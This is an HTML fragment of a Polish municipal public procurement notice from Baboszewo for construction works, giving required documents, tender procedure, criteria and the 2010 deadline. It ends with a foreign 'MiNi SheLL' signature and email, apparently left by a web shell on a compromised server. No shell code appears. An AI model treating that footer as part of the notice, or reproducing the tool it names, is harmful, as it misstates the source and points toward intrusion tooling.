<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Kosztorys ofertowy
2) Formularz umowy zaakceptowany przez Wykonawcę
3) harmonogram realizacji robót</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy  dotyczącej terminu wykonania  robót:  
    a)  Wystąpienie okoliczności niezależnych od Wykonawcy (przy zachowaniu przez niego 
    należytej staranności)  skutkujących niemożliwością dotrzymania terminu realizacji  
         przedmiotu zamówienia.
    b) Wstrzymania przez Zamawiającego  wykonywania robót z przyczyn nie leżących po 
    stronie   Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugbaboszewo.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Baboszewo
09-130 Baboszewo, ul. Warszawska 9 A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2010 godzina 11:00, miejsce: Urząd Gminy Baboszewo
09-130 Baboszewo, ul. warszawska 9 A, pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com